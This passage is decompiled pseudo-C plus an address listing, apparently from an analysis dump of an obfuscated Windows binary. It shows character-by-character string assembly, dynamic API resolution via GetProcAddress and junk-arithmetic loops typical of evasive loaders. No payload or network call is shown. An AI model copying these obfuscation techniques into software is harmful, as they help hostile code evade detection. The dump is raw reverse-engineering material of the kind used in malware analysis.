							 *0x8a9b08 = _t3364 +  *0x8a9b64;
						}
						_t3336 =  *0x8a9a5c; // 0xf78b0ce5
						 *0x8a9af0 = _t3336;
						_t3337 =  *0x8a9b78; // 0xe152
						 *0x8a9ba0 = _t3337;
						_t3338 =  *0x8a9a70; // 0x9636d1f8
						 *0x8a9a70 = E00407278(_t3338);
						_t3340 =  *0x8a9a70; // 0x9636d1f8
						_t5307 = _t3340 -  *0x8a9ba0; // 0x9636d2e0
						if(_t5307 > 0) {
							_t3343 =  *0x8a9ad4; // 0xa40b347
							 *0x8a9ba0 = _t3343 + 0xb;
							_t3345 =  *0x8a9b78; // 0xe152
							 *0x8a9ad8 = _t3345 - 6;
							asm("fild dword [0x8a9b38]");
							 *0x8a9b30 = E004076F4();
							_t3348 =  *0x8a9a88; // 0xc94a8400
							 *0x8a9ba4 = _t3348 *  *0x8a9ba4;
							_t3350 = E008A9A8C; // 0x3ec86c80
							 *0x8a9a90 = _t3350 *  *0x8a9b38;
							_t3352 =  *0x8a9b04; // 0xa55456c0
							 *0x8a9b5c = _t3352 - 0x2b;
						}
						E0040A0C0( &_v12, _v20);
					}
					_t2815 =  *0x8a9b50; // 0x3ea7bd43
					 *0x8a9b14 = _t2815;
					if(_v64 + _v56 != _v56) {
						_t2818 =  *0x8a9b08; // 0x5d9ca454
						_t2819 = _t2818 +  *0x8a9af4;
						__eflags = _t2819;
						 *0x8a9ba4 = _t2819;
					} else {
						asm("fild dword [0x8a9ad8]");
						 *0x8a9b38 = E004076E8();
					}
					_t2820 =  *0x8a9b34; // 0x535bf358
					_v424 = _t2820 + 4;
					asm("fild dword [ebp-0x1a4]");
					 *0x8a9b4c = E004076F4();
					E0040A0C0( &_v12, _v16);
					_t2825 =  *0x8a9f40; // 0x8b0925
					_v125 =  *_t2825;
					if(_v125 + 0x9f - 0x1a < 0) {
						_v125 = _v125 - 0x20;
					}
					_t2830 =  *0x8aa15c; // 0x8b091c
					_v126 =  *_t2830;
					if(_v126 + 0x9f - 0x1a < 0) {
						_v126 = _v126 - 0x20;
					}
					_t2835 =  *0x8aa1dc; // 0x8b0921
					_v127 =  *_t2835;
					if(_v127 + 0x9f - 0x1a < 0) {
						_v127 = _v127 - 0x20;
					}
					E0040A3C0(0);
					_push(_v1612);
					E0040A3C0(0);
					_push(_v1616);
					E0040A3C0(0);
					_push(_v1620);
					E0040A3C0(0);
					_push(_v1624);
					E0040A3C0(0);
					_push(_v1628);
					E0040A3C0(0);
					_push(_v1632);
					E0040A3C0(0);
					_push(_v1636);
					E0040A3C0(0);
					_push(_v1640);
					E0040A3C0(0);
					_push(_v1644);
					E0040A3C0(0);
					_push(_v1648);
					E0040A3C0(0);
					_push(_v1652);
					E0040A3C0(0);
					_push(_v1656);
					E0040A3C0(0);
					_push(_v1660);
					E0040A3C0(0);
					_push(_v1664);
					E0040A494( &_v1608, _t3910, 0xe, _t5187, _t5188);
					 *0x8b1254 = GetProcAddress(_v8, E0040A594(_v1608));
					_v36 = 0;
					E0085E4BC();
					_t2876 =  *0x8a9a40; // 0x535bf37f
					 *0x8a9ac0 = _t2876;
					_v64 = 0;
					while(_v64 < 8) {
						_v64 = _v64 + 1;
						_v68 = 0;
						while(_v68 < 7) {
							_v68 = _v68 + 1;
							_v76 = _v60 * _v28;
							_v32 = _v48 * _v24;
							_v40 = _v56 - 0xf5;
							_t3318 = E008A9A8C; // 0x3ec86c80
							 *0x8a9b20 = _t3318 +  *0x8a9b00;
							_t3320 =  *0x8a99e4; // 0xffdbe445
							 *0x8a9bb4 = _t3320 - 0xe8;
							 *0x8a9ae4 =  *0x8a9af0 * 0xe3;
						}
					}
					E0040ACEC(_v20, 2, 1,  &_v12);
					 *0x8a9b60 = 0;
					E0085E4BC();
					 *0x8a9af4 = 0xb9 -  *0x8a9adc;
					_t2885 =  *0x8a9f40; // 0x8b0925
					_v128 =  *_t2885;
					if(_v128 + 0x9f - 0x1a < 0) {
						_v128 = _v128 - 0x20;
					}
					_t2890 =  *0x8aa15c; // 0x8b091c
					_v129 =  *_t2890;
					if(_v129 + 0x9f - 0x1a < 0) {
						_v129 = _v129 - 0x20;
					}
					_t2895 =  *0x8aa0b4; // 0x8b091f
					_v130 =  *_t2895;
					if(_v130 + 0x9f - 0x1a < 0) {
						_v130 = _v130 - 0x20;
					}
					E0040A3C0(0);
					_push(_v1672);
					E0040A3C0(0);
					_push(_v1676);
					E0040A3C0(0);
					_push(_v1680);
					E0040A3C0(0);
					_push(_v1684);
					E0040A3C0(0);
					_push(_v1688);
					E0040A3C0(0);
					_push(_v1692);
					E0040A3C0(0);
					_push(_v1696);
					E0040A3C0(0);
					_push(_v1700);
					E0040A3C0(0);
					_push(_v1704);
					E0040A3C0(0);
					_push(_v1708);
					E0040A3C0(0);
					_push(_v1712);
					E0040A3C0(0);
					_push(_v1716);
					E0040A3C0(0);
					_push(_v1720);
					E0040A3C0(0);
					_push(_v1724);
					E0040A3C0(0);
					_push(_v1728);
					E0040A3C0(0);
					_push(_v1732);
					E0040A494( &_v1668, _t3910, 0x10, _t5187, _t5188);
					 *0x8b125c = GetProcAddress(_v8, E0040A594(_v1668));
					_t2938 =  *0x8a9e34; // 0x8b091e
					_v131 =  *_t2938;
					if(_v131 + 0x9f - 0x1a < 0) {
						_v131 = _v131 - 0x20;
					}
					_t2943 =  *0x8a9f40; // 0x8b0925
					_v132 =  *_t2943;
					if(_v132 + 0x9f - 0x1a < 0) {
						_v132 = _v132 - 0x20;
					}
					_t2948 =  *0x8aa0b4; // 0x8b091f
					_v133 =  *_t2948;
					if(_v133 + 0x9f - 0x1a < 0) {
						_v133 = _v133 - 0x20;
					}
					_t2953 =  *0x8aa104; // 0x8b0919
					_v134 =  *_t2953;
					if(_v134 + 0x9f - 0x1a < 0) {
						_v134 = _v134 - 0x20;
					}
					_t2958 =  *0x8a9cf4; // 0x8b0911
					_v135 =  *_t2958;
					if(_v135 + 0x9f - 0x1a < 0) {
						_v135 = _v135 - 0x20;
					}
					E0040A3C0(0);
					_push(_v1740);
					E0040A3C0(0);
					_push(_v1744);
					E0040A3C0(0);
					_push(_v1748);
					E0040A3C0(0);
					_push(_v1752);
					E0040A3C0(0);
					_push(_v1756);
					E0040A3C0(0);
					_push(_v1760);
					E0040A3C0(0);
					_push(_v1764);
					E0040A3C0(0);
					_push(_v1768);
					E0040A3C0(0);
					_push(_v1772);
					E0040A3C0(0);
					_push(_v1776);
					E0040A3C0(0);
					_push(_v1780);
					E0040A3C0(0);
					_push(_v1784);
					E0040A3C0(0);
					_push(_v1788);
					E0040A3C0(0);
					_push(_v1792);
					E0040A3C0(0);
					_push(_v1796);
					E0040A3C0(0);
					_push(_v1800);
					E0040A3C0(0);
					_push(_v1804);
					E0040A3C0(0);
					_push(_v1808);
					E0040A3C0(0);
					_push(_v1812);
					E0040A3C0(0);
					_push(_v1816);
					E0040A494( &_v1736, _t3910, 0x14, _t5187, _t5188);
					 *0x8b1240 = GetProcAddress(_v8, E0040A594(_v1736));
					_v52 = _v48 + 4;
					_v64 = 0;
					if(_v64 >= 9) {
						L200:
						_t3012 =  *0x8a9e34; // 0x8b091e
						_v151 =  *_t3012;
						__eflags = _v151 + 0x9f - 0x1a;
						if(_v151 + 0x9f - 0x1a < 0) {
							_t1564 =  &_v151;
							 *_t1564 = _v151 - 0x20;
							__eflags =  *_t1564;
						}
						_t3017 =  *0x8aa080; // 0x8b0916
						_v152 =  *_t3017;
						__eflags = _v152 + 0x9f - 0x1a;
						if(_v152 + 0x9f - 0x1a < 0) {
							_t1568 =  &_v152;
							 *_t1568 = _v152 - 0x20;
							__eflags =  *_t1568;
						}
						_t3022 =  *0x8aa104; // 0x8b0919
						_v153 =  *_t3022;
						__eflags = _v153 + 0x9f - 0x1a;
						if(_v153 + 0x9f - 0x1a < 0) {
							_t1572 =  &_v153;
							 *_t1572 = _v153 - 0x20;
							__eflags =  *_t1572;
						}
						_t3027 =  *0x8aa080; // 0x8b0916
						_v154 =  *_t3027;
						__eflags = _v154 + 0x9f - 0x1a;
						if(_v154 + 0x9f - 0x1a < 0) {
							_t1576 =  &_v154;
							 *_t1576 = _v154 - 0x20;
							__eflags =  *_t1576;
						}
						_t3032 =  *0x8a9fd0; // 0x8b0917
						_v155 =  *_t3032;
						__eflags = _v155 + 0x9f - 0x1a;
						if(_v155 + 0x9f - 0x1a < 0) {
							_t1580 =  &_v155;
							 *_t1580 = _v155 - 0x20;
							__eflags =  *_t1580;
						}
						_t3037 =  *0x8a9f14; // 0x8b0922
						_v156 =  *_t3037;
						__eflags = _v156 + 0x9f - 0x1a;
						if(_v156 + 0x9f - 0x1a < 0) {
							_t1584 =  &_v156;
							 *_t1584 = _v156 - 0x20;
							__eflags =  *_t1584;
						}
						E0040A3C0(0);
						_push(_v1944);
						E0040A3C0(0);
						_push(_v1948);
						E0040A3C0(0);
						_push(_v1952);
						E0040A3C0(0);
						_push(_v1956);
						E0040A3C0(0);
						_push(_v1960);
						E0040A3C0(0);
						_push(_v1964);
						E0040A3C0(0);
						_push(_v1968);
						E0040A3C0(0);
						_push(_v1972);
						E0040A3C0(0);
						_push(_v1976);
						E0040A3C0(0);
						_push(_v1980);
						E0040A3C0(0);
						_push(_v1984);
						E0040A3C0(0);
						_push(_v1988);
						E0040A3C0(0);
						_push(_v1992);
						E0040A3C0(0);
						_push(_v1996);
						E0040A3C0(0);
						_push(_v2000);
						E0040A3C0(0);
						_push(_v2004);
						E0040A3C0(0);
						_push(_v2008);
						E0040A3C0(0);
						_push(_v2012);
						E0040A3C0(0);
						_push(_v2016);
						E0040A3C0(0);
						_push(_v2020);
						E0040A3C0(0);
						_push(_v2024);
						E0040A3C0(0);
						_push(_v2028);
						E0040A3C0(0);
						_push(_v2032);
						E0040A3C0(0);
						_push(_v2036);
						E0040A3C0(0);
						_push(_v2040);
						E0040A3C0(0);
						_push(_v2044);
						E0040A3C0(0);
						E0040A494( &_v1940, _t3910, 0x1b, _t5187, _t5188);
						E0040A9E8( &_v20, _v1940, _v2048);
						E0040A0C0( &_v12, _v20);
						E0040A0C0( &_v16, _v12);
						_push(_t5190);
						_push(0x862ccb);
						_push( *[fs:eax]);
						 *[fs:eax] = _t5191;
						_t3105 =  *0x8a9f40; // 0x8b0925
						_v157 =  *_t3105;
						__eflags = _v157 + 0x9f - 0x1a;
						if(_v157 + 0x9f - 0x1a < 0) {
							_t1655 =  &_v157;
							 *_t1655 = _v157 - 0x20;
							__eflags =  *_t1655;
						}
						_t3110 =  *0x8aa0b8; // 0x8b0928
						_v158 =  *_t3110;
						__eflags = _v158 + 0x9f - 0x1a;
						if(_v158 + 0x9f - 0x1a < 0) {
							_t1659 =  &_v158;
							 *_t1659 = _v158 - 0x20;
							__eflags =  *_t1659;
						}
						_t3115 =  *0x8a9fcc; // 0x8b0927
						_v159 =  *_t3115;
						__eflags = _v159 + 0x9f - 0x1a;
						if(_v159 + 0x9f - 0x1a < 0) {
							_t1663 =  &_v159;
							 *_t1663 = _v159 - 0x20;
							__eflags =  *_t1663;
						}
						_t3120 =  *0x8a9d20; // 0x8b0920
						_v160 =  *_t3120;
						__eflags = _v160 + 0x9f - 0x1a;
						if(_v160 + 0x9f - 0x1a < 0) {
							_t1667 =  &_v160;
							 *_t1667 = _v160 - 0x20;
							__eflags =  *_t1667;
						}
						_t3125 =  *0x8a9c3c; // 0x8b0918
						_v161 =  *_t3125;
						__eflags = _v161 + 0x9f - 0x1a;
						if(_v161 + 0x9f - 0x1a < 0) {
							_t1671 =  &_v161;
							 *_t1671 = _v161 - 0x20;
							__eflags =  *_t1671;
						}
						_t3130 =  *0x8aa104; // 0x8b0919
						_v162 =  *_t3130;
						__eflags = _v162 + 0x9f - 0x1a;
						if(__eflags < 0) {
							_t1675 =  &_v162;
							 *_t1675 = _v162 - 0x20;
							__eflags =  *_t1675;
						}
						E0040A3C0(0);
						_push(_v2052);
						E0040A3C0(0);
						_push(_v2056);
						E0040A3C0(0);
						_push(_v2060);
						E0040A3C0(0);
						_push(_v2064);
						E0040A3C0(0);
						_push(_v2068);
						E0040A3C0(0);
						_push(_v2072);
						E006BA5A8(7,  &_v2076, __eflags);
						_push(_v2076);
						E0040A494( &_v168, _t3910, 7, _t5187, _t5188);
						_t3151 =  *0x8a9ce4; // 0x8b0912
						_v163 =  *_t3151;
						__eflags = _v163 + 0x9f - 0x1a;
						if(_v163 + 0x9f - 0x1a < 0) {
							_t1700 =  &_v163;
							 *_t1700 = _v163 - 0x20;
							__eflags =  *_t1700;
						}
						_t3156 =  *0x8aa15c; // 0x8b091c
						_v169 =  *_t3156;
						__eflags = _v169 + 0x9f - 0x1a;
						if(_v169 + 0x9f - 0x1a < 0) {
							_t1704 =  &_v169;
							 *_t1704 = _v169 - 0x20;
							__eflags =  *_t1704;
						}
						_t3161 =  *0x8a9f14; // 0x8b0922
						_v170 =  *_t3161;
						__eflags = _v170 + 0x9f - 0x1a;
						if(_v170 + 0x9f - 0x1a < 0) {
							_t1708 =  &_v170;
							 *_t1708 = _v170 - 0x20;
							__eflags =  *_t1708;
						}
						_t3166 =  *0x8a9f14; // 0x8b0922
						_v171 =  *_t3166;
						__eflags = _v171 + 0x9f - 0x1a;
						if(_v171 + 0x9f - 0x1a < 0) {
							_t1712 =  &_v171;
							 *_t1712 = _v171 - 0x20;
							__eflags =  *_t1712;
						}
						_push(_v168);
						E0040A3C0(0);
						_push(_v2084);
						_push(0x86f534);
						E0040A3C0(0);
						_push(_v2088);
						E0040A3C0(0);
						_push(_v2092);
						E0040A3C0(0);
						E0040A494( &_v2080, _t3910, 6, _t5187, _t5188);
						E0040A9E8( &_v20, _v2080, _v2096);
						__eflags = 0;
						_pop(_t4842);
						 *[fs:eax] = _t4842;
						_push(0x862cd2);
						return E00409CBC( &_v168);
					} else {
						while(1) {
							_v64 = _v64 + 1;
							if(_v60 - _v76 < 0x43) {
								break;
							}
							__eflags = _v64 - 9;
							if(_v64 < 9) {
								continue;
							} else {
								goto L200;
							}
							goto L252;
						}
						_v72 = _v36 * _v24;
						_v28 = _v44 + 4;
						E0040A0C0( &_v16, _v16);
						_t3194 =  *0x8a9ffc; // 0x8b091a
						_v136 =  *_t3194;
						if(_v136 + 0x9f - 0x1a < 0) {
							_v136 = _v136 - 0x20;
						}
						_t3199 =  *0x8a9fbc; // 0x8b0929
						_v137 =  *_t3199;
						if(_v137 + 0x9f - 0x1a < 0) {
							_v137 = _v137 - 0x20;
						}
						_t3204 =  *0x8a9ffc; // 0x8b091a
						_v138 =  *_t3204;
						if(_v138 + 0x9f - 0x1a < 0) {
							_v138 = _v138 - 0x20;
						}
						E0040A3C0(0);
						_push(_v1824);
						E0040A3C0(0);
						_push(_v1828);
						E0040A3C0(0);
						_push(_v1832);
						E0040A3C0(0);
						_push(_v1836);
						E0040A3C0(0);
						_push(_v1840);
						E0040A3C0(0);
						_push(_v1844);
						E0040A3C0(0);
						_push(_v1848);
						E0040A3C0(0);
						_push(_v1852);
						E0040A3C0(0);
						_push(_v1856);
						E0040A3C0(0);
						_push(_v1860);
						E0040A3C0(0);
						_push(_v1864);
						E0040A3C0(0);
						_push(_v1868);
						E0040A3C0(0);
						_push(_v1872);
						E0040A3C0(0);
						_push(_v1876);
						E0040A3C0(0);
						E0040A494( &_v1820, _t3910, 0xf, _t5187, _t5188);
						E0040A9E8( &_v16, _v1820, _v1880);
						E0040A0C0( &_v12, _v16);
						_push(_t5190);
						_push(0x8625da);
						_push( *[fs:eax]);
						 *[fs:eax] = _t5191;
						_t3246 =  *0x8aa02c; // 0x8b0926
						_v139 =  *_t3246;
						if(_v139 + 0x9f - 0x1a < 0) {
							_v139 = _v139 - 0x20;
						}
						_t3251 =  *0x8aa080; // 0x8b0916
						_v140 =  *_t3251;
						if(_v140 + 0x9f - 0x1a < 0) {
							_v140 = _v140 - 0x20;
						}
						_t3256 =  *0x8a9fd0; // 0x8b0917
						_v141 =  *_t3256;
						if(_v141 + 0x9f - 0x1a < 0) {
							_t1509 =  &_v141;
							 *_t1509 = _v141 - 0x20;
							_t5349 =  *_t1509;
						}
						E0040A3C0(0);
						_push(_v1884);
						E0040A3C0(0);
						_push(_v1888);
						E0040A3C0(0);
						_push(_v1892);
						E0040A3C0(0);
						_push(_v1896);
						E0040A3C0(0);
						_push(_v1900);
						E006BA5A8(2,  &_v1904, _t5349);
						_push(_v1904);
						E0040A494( &_v148, _t3910, 6, _t5187, _t5188);
						_t3275 =  *0x8a9e00; // 0x8b091d
						_v142 =  *_t3275;
						if(_v142 + 0x9f - 0x1a < 0) {
							_v142 = _v142 - 0x20;
						}
						_t3280 =  *0x8aa080; // 0x8b0916
						_v149 =  *_t3280;
						if(_v149 + 0x9f - 0x1a < 0) {
							_v149 = _v149 - 0x20;
						}
						_t3285 =  *0x8a9fd0; // 0x8b0917
						_v150 =  *_t3285;
						if(_v150 + 0x9f - 0x1a < 0) {
							_t1537 =  &_v150;
							 *_t1537 = _v150 - 0x20;
							_t5355 =  *_t1537;
						}
						_push(_v148);
						E0040A3C0(0);
						_push(_v1912);
						E0040A3C0(0);
						_push(_v1916);
						E0040A3C0(0);
						_push(_v1920);
						E0040A3C0(0);
						_push(_v1924);
						E0040A3C0(0);
						_push(_v1928);
						E0040A3C0(0);
						_push(_v1932);
						E006BA5A8(1,  &_v1936, _t5355);
						E0040A494( &_v1908, _t3910, 8, _t5187, _t5188);
						E0040A9E8( &_v20, _v1908, _v1936);
						_pop(_t4896);
						 *[fs:eax] = _t4896;
						_push(E008625E1);
						return E00409CBC( &_v148);
					}
				}
				L252:
				L1:
				_push(0);
				_push(0);
				_t3911 = _t3911 - 1;
				if(_t3911 != 0) {
					goto L1;
				} else {
					_push(_t3911);
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					_push(_t5190);
					_push(0x86f3c3);
					_push( *[fs:eax]);
					 *[fs:eax] = _t5191;
					_t1874 =  *0x8a99d4; // 0x0
					_v80 = _t1874;
					if(_v80 != 0) {
						_v80 =  *((intOrPtr*)(_v80 - 4));
					}
					if(_v80 != 0x42) {
						E0040A0C0( &_v20, _v20);
					} else {
						if(_v56 <= _v68) {
							E0040A0C0( &_v16, _v12);
							E0040A0C0( &_v12, _v20);
							__eflags = 0;
							E0040ACEC(_v12, 0, 1,  &_v20);
							E0040A0C0( &_v16, _v20);
							E0040A0C0( &_v12, _v20);
							E0040A0C0( &_v16, _v12);
						} else {
							_v64 = _v28 + 0x7a;
							_v72 = _v40 + 0x79;
							_v48 = _v76 * _v24;
							_v44 = _v60 + _v32;
							E0040A0C0( &_v16, _v12);
							_t3865 =  &_v412;
							_t5154 =  *0x8a9e34; // 0x8b091e
							 *((char*)(_t3865 + 1)) =  *_t5154;
							 *_t3865 = 1;
							E0040A324( &_v416,  &_v412);
							_t3868 =  &_v420;
							_t5157 =  *0x8a9f40; // 0x8b0925
							 *((char*)(_t3868 + 1)) =  *_t5157;
							 *_t3868 = 1;
							E0040A34C( &_v416, 2,  &_v420);
							E0040A324( &_v424,  &_v416);
							_t3873 =  &_v420;
							_t5161 =  *0x8aa15c; // 0x8b091c
							 *((char*)(_t3873 + 1)) =  *_t5161;
							 *_t3873 = 1;
							E0040A34C( &_v424, 3,  &_v420);
							E0040A324( &_v432,  &_v424);
							_t3878 =  &_v420;
							_t5165 =  *0x8a9ce4; // 0x8b0912
							 *((char*)(_t3878 + 1)) =  *_t5165;
							 *_t3878 = 1;
							E0040A34C( &_v432, 4,  &_v420);
							E0040A324( &_v440,  &_v432);
							_t3883 =  &_v420;
							_t5169 =  *0x8a9e00; // 0x8b091d
							 *((char*)(_t3883 + 1)) =  *_t5169;
							 *_t3883 = 1;
							E0040A34C( &_v440, 5,  &_v420);
							E0040A324( &_v448,  &_v440);
							E0040A34C( &_v448, 6, 0x86f3d4);
							E0040A324( &_v456,  &_v448);
							_t3892 =  &_v420;
							_t5175 =  *0x8aa15c; // 0x8b091c
							 *((char*)(_t3892 + 1)) =  *_t5175;
							 *_t3892 = 1;
							E0040A34C( &_v456, 7,  &_v420);
							E0040A324( &_v468,  &_v456);
							_t3897 =  &_v420;
							_t5179 =  *0x8a9f14; // 0x8b0922
							 *((char*)(_t3897 + 1)) =  *_t5179;
							 *_t3897 = 1;
							E0040A34C( &_v468, 8,  &_v420);
							E0040A324( &_v480,  &_v468);
							_t3902 =  &_v420;
							_t5183 =  *0x8a9f14; // 0x8b0922
							 *((char*)(_t3902 + 1)) =  *_t5183;
							 *_t3902 = 1;
							E0040A34C( &_v480, 9,  &_v420);
							E0040AA98( &_v480);
						}
						E0040A0C0( &_v12, _v16);
					}
					E0040A0C0( &_v20, _v20);
					E0040A0C0( &_v12, _v16);
					if(_v28 - _v48 != _v60) {
						E0040A0C0( &_v16, _v16);
					} else {
						if(_v76 + _v76 >= _v32 + _v76) {
							E0040A0C0( &_v20, L"api-ms-win-crt-process-l1-1-0.dll");
							E0040A0C0( &_v12, _v12);
							E0040A0C0( &_v12, _v16);
							E0040ACEC(_v20, 2, 1,  &_v20);
							E0040A0C0( &_v12, _v16);
							E0040ACEC(_v20, 2, 1,  &_v16);
						} else {
							E0040A0C0( &_v12, _v20);
							E0040ACEC(_v12, 0, 1,  &_v16);
							_t3776 =  &_v412;
							_t5097 =  *0x8a9ce4; // 0x8b0912
							 *((char*)(_t3776 + 1)) =  *_t5097;
							 *_t3776 = 1;
							E0040A324( &_v416,  &_v412);
							_t3779 =  &_v420;
							_t5100 =  *0x8aa02c; // 0x8b0926
							 *((char*)(_t3779 + 1)) =  *_t5100;
							 *_t3779 = 1;
							E0040A34C( &_v416, 2,  &_v420);
							E0040A324( &_v424,  &_v416);
							_t3784 =  &_v420;
							_t5104 =  *0x8a9ce4; // 0x8b0912
							 *((char*)(_t3784 + 1)) =  *_t5104;
							 *_t3784 = 1;
							E0040A34C( &_v424, 3,  &_v420);
							E0040A324( &_v432,  &_v424);
							_t3789 =  &_v420;
							_t5108 =  *0x8aa0b8; // 0x8b0928
							 *((char*)(_t3789 + 1)) =  *_t5108;
							 *_t3789 = 1;
							E0040A34C( &_v432, 4,  &_v420);
							E0040A324( &_v440,  &_v432);
							_t3794 =  &_v420;
							_t5112 =  *0x8a9f34; // 0x8b0914
							 *((char*)(_t3794 + 1)) =  *_t5112;
							 *_t3794 = 1;
							E0040A34C( &_v440, 5,  &_v420);
							E0040A324( &_v448,  &_v440);
							_t3799 =  &_v420;
							_t5116 =  *0x8a9f40; // 0x8b0925
							 *((char*)(_t3799 + 1)) =  *_t5116;
							 *_t3799 = 1;
							E0040A34C( &_v448, 6,  &_v420);
							E0040A324( &_v456,  &_v448);
							_t3804 =  &_v420;
							_t5120 =  *0x8a9f14; // 0x8b0922
							 *((char*)(_t3804 + 1)) =  *_t5120;
							 *_t3804 = 1;
							E0040A34C( &_v456, 7,  &_v420);
							E0040A324( &_v468,  &_v456);
							_t3809 =  &_v420;
							_t5124 =  *0x8aa288; // 0x8b091b
							 *((char*)(_t3809 + 1)) =  *_t5124;
							 *_t3809 = 1;
							E0040A34C( &_v468, 8,  &_v420);
							E0040A324( &_v480,  &_v468);
							E0040A34C( &_v480, 9, 0x86f3d4);
							E0040A324( &_v492,  &_v480);
							_t3818 =  &_v420;
							_t5130 =  *0x8aa15c; // 0x8b091c
							 *((char*)(_t3818 + 1)) =  *_t5130;
							 *_t3818 = 1;
							E0040A34C( &_v492, 0xa,  &_v420);
							E0040A324( &_v504,  &_v492);
							_t3823 =  &_v420;
							_t5134 =  *0x8a9f14; // 0x8b0922
							 *((char*)(_t3823 + 1)) =  *_t5134;
							 *_t3823 = 1;
							E0040A34C( &_v504, 0xb,  &_v420);
							E0040A324( &_v520,  &_v504);
							_t3828 =  &_v420;
							_t5138 =  *0x8a9f14; // 0x8b0922
							 *((char*)(_t3828 + 1)) =  *_t5138;
							 *_t3828 = 1;
							E0040A34C( &_v520, 0xc,  &_v420);
							E0040AA98( &_v520);
							E0040A0C0( &_v12, _v20);
							E0040A0C0( &_v12, L"wmpshell.dll");
							E0040A0C0( &_v16, L"NetLocalGroupGetInfo");
						}
					}
					E0040A0C0( &_v20, _v16);
					if(_v76 - _v60 < 0xd0) {
						E0040A0C0( &_v20, L"FXSCOM.dll");
					}
				}
				goto L17;
			}
























































































































































































































































































































































































































































































































































































































































































































































































































                                                              0x0085e760
                                                              0x0085e760
                                                              0x0085e760
                                                              0x0085e761
                                                              0x0085e763
                                                              0x0085e763
                                                              0x0085ed8f
                                                              0x0085ed91
                                                              0x0085ed92
                                                              0x0085ed97
                                                              0x0085ed9a
                                                              0x0085eda3
                                                              0x0085eda8
                                                              0x0085edad
                                                              0x0085edba
                                                              0x0085edc5
                                                              0x0085edc9
                                                              0x0085edd2
                                                              0x0085edd8
                                                              0x0085ede3
                                                              0x0085ede6
                                                              0x0085edee
                                                              0x0085edf1
                                                              0x0085edf9
                                                              0x0085ee03
                                                              0x0085ee12
                                                              0x0085ee17
                                                              0x0085ee21
                                                              0x0085ee21
                                                              0x0085ee33
                                                              0x0085ee38
                                                              0x0085ee3d
                                                              0x0085ee44
                                                              0x0085ee4e
                                                              0x0085ee50
                                                              0x0085ee50
                                                              0x0085ee54
                                                              0x0085ee5b
                                                              0x0085ee65
                                                              0x0085ee67
                                                              0x0085ee67
                                                              0x0085ee6b
                                                              0x0085ee72
                                                              0x0085ee7c
                                                              0x0085ee7e
                                                              0x0085ee7e
                                                              0x0085ee82
                                                              0x0085ee89
                                                              0x0085ee93
                                                              0x0085ee95
                                                              0x0085ee95
                                                              0x0085eea7
                                                              0x0085eeac
                                                              0x0085eec5
                                                              0x0085eeca
                                                              0x0085eee3
                                                              0x0085eee8
                                                              0x0085ef01
                                                              0x0085ef06
                                                              0x0085ef1f
                                                              0x0085ef24
                                                              0x0085ef38
                                                              0x0085ef3d
                                                              0x0085ef56
                                                              0x0085ef5b
                                                              0x0085ef74
                                                              0x0085ef79
                                                              0x0085ef92
                                                              0x0085ef97
                                                              0x0085efab
                                                              0x0085efb0
                                                              0x0085efc9
                                                              0x0085efce
                                                              0x0085efe2
                                                              0x0085eff8
                                                              0x0085f006
                                                              0x0085f01a
                                                              0x0085f01f
                                                              0x0085f034
                                                              0x0085f039
                                                              0x0085f04e
                                                              0x0085f053
                                                              0x0085f068
                                                              0x0085f06d
                                                              0x0085f082
                                                              0x0085f087
                                                              0x0085f09c
                                                              0x0085f0a1
                                                              0x0085f0b2
                                                              0x0085f0b7
                                                              0x0085f0c8
                                                              0x0085f0cd
                                                              0x0085f0d3
                                                              0x0085f0e7
                                                              0x0085f0ec
                                                              0x0085f101
                                                              0x0085f106
                                                              0x0085f11b
                                                              0x0085f120
                                                              0x0085f131
                                                              0x0085f142
                                                              0x0085f158
                                                              0x0085f15d
                                                              0x0085f160
                                                              0x0085f166
                                                              0x0085f16b
                                                              0x0085f16e
                                                              0x0085f176
                                                              0x0085f179
                                                              0x0085f180
                                                              0x0085f183
                                                              0x0085f189
                                                              0x0085f18e
                                                              0x0085f191
                                                              0x0085f199
                                                              0x0085f1a0
                                                              0x0085f1a6
                                                              0x0085f1af
                                                              0x0085f1b6
                                                              0x0085f1bd
                                                              0x0085f1bf
                                                              0x0085f1c8
                                                              0x0085f1d3
                                                              0x0085f1d6
                                                              0x0085f1e1
                                                              0x0085f1e6
                                                              0x0085f1ee
                                                              0x0085f1f3
                                                              0x0085f1fb
                                                              0x0085f201
                                                              0x0085f20c
                                                              0x0085f21b
                                                              0x0085f220
                                                              0x0085f226
                                                              0x0085f236
                                                              0x0085f23d
                                                              0x0085f242
                                                              0x0085f24b
                                                              0x0086eb61
                                                              0x0086eb68
                                                              0x0086eb6b
                                                              0x0086eb75
                                                              0x0086eb7a
                                                              0x0086eb7f
                                                              0x0086eb84
                                                              0x0086eb89
                                                              0x0086eb8f
                                                              0x0086eb97
                                                              0x0086eb9a
                                                              0x0086eba2
                                                              0x0086ebad
                                                              0x0086ebb3
                                                              0x0086ebbe
                                                              0x0086ebc1
                                                              0x0086ebc9
                                                              0x0086ebce
                                                              0x0086ebd9
                                                              0x0086ebde
                                                              0x0086ebe3
                                                              0x0086ebe3
                                                              0x0086ebe9
                                                              0x0086ebe9
                                                              0x0086ebf4
                                                              0x0086ec03
                                                              0x0086ec0a
                                                              0x0086ec0f
                                                              0x0086ec23
                                                              0x0086ec2b
                                                              0x0086ec32
                                                              0x0086ec37
                                                              0x0086ec3c
                                                              0x0086ec41
                                                              0x0086ec48
                                                              0x0086ec4b
                                                              0x0086ec60
                                                              0x0086ec65
                                                              0x0086ec68
                                                              0x0086ec6c
                                                              0x0086ec72
                                                              0x0086ec75
                                                              0x0086ec77
                                                              0x0086ec7a
                                                              0x0086ec80
                                                              0x0086ec86
                                                              0x0086ec91
                                                              0x0086ec9c
                                                              0x0086ec9f
                                                              0x0086ecaa
                                                              0x0086ecaf
                                                              0x0086ecba
                                                              0x0086ecbf
                                                              0x0086ecca
                                                              0x0086eccf
                                                              0x0086ecd9
                                                              0x0086ecdf
                                                              0x0086ecea
                                                              0x0086ecef
                                                              0x0086ecf2
                                                              0x0086ecf2
                                                              0x0086ecfe
                                                              0x0086ed03
                                                              0x0086ed7e
                                                              0x0086ed8a
                                                              0x0086ed8f
                                                              0x0086ed99
                                                              0x0086ed9e
                                                              0x0086eda8
                                                              0x0086edad
                                                              0x0086edb5
                                                              0x0086edbb
                                                              0x0086edc6
                                                              0x0086edcb
                                                              0x0086edd0
                                                              0x0086edd0
                                                              0x0086edd3
                                                              0x0086ed05
                                                              0x0086ed05
                                                              0x0086ed0d
                                                              0x0086ed13
                                                              0x0086ed1e
                                                              0x0086ed2d
                                                              0x0086ed32
                                                              0x0086ed3d
                                                              0x0086ed4d
                                                              0x0086ed5d
